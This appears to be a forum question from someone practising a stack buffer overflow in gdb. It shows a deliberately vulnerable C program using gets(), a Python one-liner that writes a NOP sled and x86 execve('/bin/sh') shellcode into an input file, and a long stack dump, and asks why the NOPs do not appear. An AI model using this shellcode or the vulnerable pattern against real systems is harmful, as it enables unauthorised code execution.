I have written a piece of code, and I'm trying to perform a buffer overflow.
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv){
char buffer[100];
gets(buffer);
return 0;
}
When I run it inside gdb I can see that I have successfully found the eip offset. Now when I try to see, where my block of NOPs has landed in the stack, I don't see them.
The command I run inside gdb
run < attack.txt
and the contents of my attack.txt file
python -c "import sys; sys.stdout.buffer.write(b'\x90'*60 + b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80' + b'BBBB'*6)" > attack.txt
Below the contents in the stack
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/500x $esp
0xffffd3a0: 0x00000000 0xffffd454 0xffffd45c 0xffffd3c0
0xffffd3b0: 0xf7f95e2c 0x0804908d 0x00000001 0xffffd454
0xffffd3c0: 0xf7f95e2c 0xffffd45c 0xf7ffcb60 0x00000000
0xffffd3d0: 0xc81e9d2d 0x856cb73d 0x00000000 0x00000000
0xffffd3e0: 0x00000000 0xf7ffcb60 0x00000000 0x1d5e4400
0xffffd3f0: 0xf7ffda20 0xf7d96a86 0xf7f95e2c 0xf7d96bbd
0xffffd400: 0xf7fc9a80 0x0804befc 0x00000000 0xf7ffd000
0xffffd410: 0x00000000 0xf7fda9c0 0xf7d96b3d 0x0804bff4
0xffffd420: 0x00000001 0x08049060 0x00000000 0x08049088
0xffffd430: 0x0804908d 0x00000001 0xffffd454 0x00000000
0xffffd440: 0x00000000 0xf7fcdeb0 0xffffd44c 0xf7ffda20
0xffffd450: 0x00000001 0xffffd65e 0x00000000 0xffffd696
0xffffd460: 0xffffd6a6 0xffffd6ba 0xffffd6f0 0xffffd6fd
0xffffd470: 0xffffd737 0xffffd764 0xffffd77b 0xffffd78f
0xffffd480: 0xffffd7b4 0xffffd7e7 0xffffd825 0xffffd83c
0xffffd490: 0xffffd854 0xffffd897 0xffffd8a7 0xffffd8b3
0xffffd4a0: 0xffffd8d3 0xffffd8e2 0xffffd915 0xffffd920
0xffffd4b0: 0xffffd93b 0xffffd950 0xffffd965 0xffffd974
0xffffd4c0: 0xffffd994 0xffffd9c2 0xffffd9d1 0xffffd9da
0xffffd4d0: 0xffffda2a 0xffffda38 0xffffda49 0xffffda5e
0xffffd4e0: 0xffffda76 0xffffda82 0xffffdb06 0xffffdb17
0xffffd4f0: 0xffffdb4b 0xffffdb7a 0xffffdbc6 0xffffdbd5
0xffffd500: 0xffffdbea 0xffffdc01 0xffffdc1f 0xffffdc33
0xffffd510: 0xffffdc3b 0xffffdc51 0xffffdc83 0xffffdc8e
0xffffd520: 0xffffdc96 0xffffdcaf 0xffffdcca 0xffffdcd5
0xffffd530: 0xffffdce6 0xffffdd05 0xffffdd37 0xffffdd4b
0xffffd540: 0xffffdd69 0xffffdd7f 0xffffdd98 0xffffddb6
0xffffd550: 0xffffde2b 0xffffde41 0xffffde51 0xffffdf1d
0xffffd560: 0xffffdf2f 0xffffdf65 0xffffdf81 0xffffdf99
0xffffd570: 0xffffdfb0 0x00000000 0x00000020 0xf7fc7570
0xffffd580: 0x00000021 0xf7fc7000 0x00000033 0x000006f0
0xffffd590: 0x00000010 0xbfebfbff 0x00000006 0x00001000
0xffffd5a0: 0x00000011 0x00000064 0x00000003 0x08048034
0xffffd5b0: 0x00000004 0x00000020 0x00000005 0x0000000c
0xffffd5c0: 0x00000007 0xf7fc9000 0x00000008 0x00000000
0xffffd5d0: 0x00000009 0x08049060 0x0000000b 0x000003e8
0xffffd5e0: 0x0000000c 0x000003e8 0x0000000d 0x000003e8
0xffffd5f0: 0x0000000e 0x000003e8 0x00000017 0x00000000
0xffffd600: 0x00000019 0xffffd63b 0x0000001a 0x00000002
0xffffd610: 0x0000001f 0xffffdfc0 0x0000000f 0xffffd64b
0xffffd620: 0x0000001b 0x0000001c 0x0000001c 0x00000020
0xffffd630: 0x00000000 0x00000000 0xf5000000 0xee1d5e44
0xffffd640: 0x38691bdc 0x92042efc 0x69b762c8 0x00363836
0xffffd650: 0x00000000 0x00000000 0x00000000 0x682f0000
0xffffd660: 0x2f656d6f 0x622f3372 0x65666675 0x766f2d72
0xffffd670: 0x6c667265 0x2f73776f 0x69206f62 0x656d206e
0xffffd680: 0x79726f6d 0x61786520 0x656c706d 0x6178652f
0xffffd690: 0x656c706d 0x48530032 0x3d4c4c45 0x6e69622f
0xffffd6a0: 0x7361622f 0x4f430068 0x54524f4c 0x3d4d5245
0xffffd6b0: 0x65757274 0x6f6c6f63 0x44580072 0x4f435f47
0xffffd6c0: 0x4749464e 0x5249445f 0x682f3d53 0x2f656d6f
0xffffd6d0: 0x2e2f3372 0x666e6f63 0x6b2f6769 0x65646564
0xffffd6e0: 0x6c756166 0x2f3a7374 0x2f637465 0x00676478
0xffffd6f0: 0x434e5546 0x5453454e 0x3030313d 0x47445800
0xffffd700: 0x5345535f 0x4e4f4953 0x5441505f 0x6f2f3d48
0xffffd710: 0x662f6772 0x64656572 0x746b7365 0x442f706f
0xffffd720: 0x6c707369 0x614d7961 0x6567616e 0x65532f72
0xffffd730: 0x6f697373 0x5400306e 0x494d5245 0x4f54414e
0xffffd740: 0x42445f52 0x505f5355 0x3d485441 0x74656e2f
0xffffd750: 0x6e65742f 0x2f756873 0x6d726554 0x74616e69
0xffffd760: 0x0032726f 0x415f434c 0x45524444 0x733d5353
0xffffd770: 0x4c415f71 0x4654552e 0x4c00382d 0x414e5f43
0xffffd780: 0x733d454d 0x4c415f71 0x4654552e 0x5300382d
0xffffd790: 0x415f4853 0x5f485455 0x4b434f53 0x75722f3d
0xffffd7a0: 0x73752f6e 0x312f7265 0x2f303030 0x2f726367
0xffffd7b0: 0x00687373 0x4f4d454d 0x505f5952 0x53534552
0xffffd7c0: 0x5f455255 0x54495257 0x32633d45 0x535a7439
0xffffd7d0: 0x444d7941 0x444d7741 0x6a4d6741 0x444d7741
0xffffd7e0: 0x414d7741 0x54003d41 0x494d5245 0x4f54414e
0xffffd7f0: 0x55555f52 0x753d4449 0x753a6e72 0x3a646975
0xffffd800: 0x39313630 0x39303261 0x3664632d 0x32342d61
0xffffd810: 0x392d3237 0x2d386161 0x39303364 0x35363136
0xffffd820: 0x34613261 0x53454400 0x504f544b 0x5345535f
0xffffd830: 0x4e4f4953 0x616c703d 0x00616d73 0x4d5f434c
0xffffd840: 0x54454e4f 0x3d595241 0x415f7173 0x54552e4c
0xffffd850: 0x00382d46 0x5f4b5447 0x465f4352 0x53454c49
0xffffd860: 0x74652f3d 0x74672f63 0x74672f6b 0x3a63726b
0xffffd870: 0x6d6f682f 0x33722f65 0x74672e2f 0x3a63726b
0xffffd880: 0x6d6f682f 0x33722f65 0x6f632e2f 0x6769666e
0xffffd890: 0x6b74672f 0x58006372 0x53525543 0x535f524f
0xffffd8a0: 0x3d455a49 0x45003631 0x4f544944 0x616e3d52
0xffffd8b0: 0x47006f6e 0x4d5f4b54 0x4c55444f 0x633d5345
0xffffd8c0: 0x65626e61 0x2d617272 0x2d6b7467 0x75646f6d
0xffffd8d0: 0x5800656c 0x535f4744 0x3d544145 0x74616573
0xffffd8e0: 0x57500030 0x682f3d44 0x2f656d6f 0x622f3372
0xffffd8f0: 0x65666675 0x766f2d72 0x6c667265 0x2f73776f
0xffffd900: 0x69206f62 0x656d206e 0x79726f6d 0x61786520
0xffffd910: 0x656c706d 0x474f4c00 0x454d414e 0x0033723d
0xffffd920: 0x5f474458 0x53534553 0x5f4e4f49 0x4b534544
0xffffd930: 0x3d504f54 0x73616c70 0x5800616d 0x535f4744
0xffffd940: 0x49535345 0x545f4e4f 0x3d455059 0x00313178
0xffffd950: 0x54535953 0x5f444d45 0x43455845 0x4449505f
0xffffd960: 0x3736383d 0x2f3d5f00 0x2f727375 0x2f6e6962
0xffffd970: 0x00626467 0x54554158 0x49524f48 0x2f3d5954
0xffffd980: 0x656d6f68 0x2f33722f 0x7561582e 0x726f6874
0xffffd990: 0x00797469 0x5f474458 0x45455247 0x5f524554
0xffffd9a0: 0x41544144 0x5249445f 0x61762f3d 0x696c2f72
0xffffd9b0: 0x696c2f62 0x64746867 0x61642d6d 0x722f6174
0xffffd9c0: 0x4f4d0033 0x535f4454 0x4e574f48 0x6d61703d
0xffffd9d0: 0x4e494c00 0x343d5345 0x54470034 0x525f324b
0xffffd9e0: 0x49465f43 0x3d53454c 0x6374652f 0x6b74672f
0xffffd9f0: 0x302e322d 0x6b74672f 0x2f3a6372 0x656d6f68
0xffffda00: 0x2f33722f 0x6b74672e 0x322d6372 0x2f3a302e
0xffffda10: 0x656d6f68 0x2f33722f 0x6e6f632e 0x2f676966
0xffffda20: 0x726b7467 0x2e322d63 0x4f480030 0x2f3d454d
0xffffda30: 0x656d6f68 0x0033722f 0x474e414c 0x5f6e653d
0xffffda40: 0x552e5355 0x382d4654 0x5f434c00 0x45504150
0xffffda50: 0x71733d52 0x2e4c415f 0x2d465455 0x44580038
0xffffda60: 0x55435f47 0x4e455252 0x45445f54 0x4f544b53
0xffffda70: 0x444b3d50 0x4f430045 0x4e4d554c 0x39313d53
0xffffda80: 0x454d0035 0x59524f4d 0x4552505f 0x52555353
0xffffda90: 0x41575f45 0x3d484354 0x7379732f 0x2f73662f
0xffffdaa0: 0x6f726763 0x752f7075 0x2e726573 0x63696c73
0xffffdab0: 0x73752f65 0x312d7265 0x2e303030 0x63696c73
0xffffdac0: 0x73752f65 0x31407265 0x2e303030 0x76726573
0xffffdad0: 0x2f656369 0x73736573 0x2e6e6f69 0x63696c73
0xffffdae0: 0x6c702f65 0x616d7361 0x65646b2d 0x65732e64
0xffffdaf0: 0x63697672 0x656d2f65 0x79726f6d 0x6572702e
0xffffdb00: 0x72757373 0x54560065 0x45565f45 0x4f495352
0xffffdb10: 0x34373d4e 0x58003230 0x535f4744 0x5f544145
0xffffdb20: 0x48544150 0x726f2f3d 0x72662f67 0x65646565
0xffffdb30: 0x6f746b73 0x69442f70 0x616c7073 0x6e614d79
0xffffdb40: 0x72656761 0x6165532f 0x49003074 0x434f564e
0xffffdb50: 0x4f495441 0x44495f4e 0x6332613d 0x63336361
0xffffdb60: 0x37663239 0x33623466 0x39316235 0x31346530
I had the same program, but instead of gets I used strcpy, and I did find the NOPs in the stack. So why isn't this working now? I have disabled ASLR.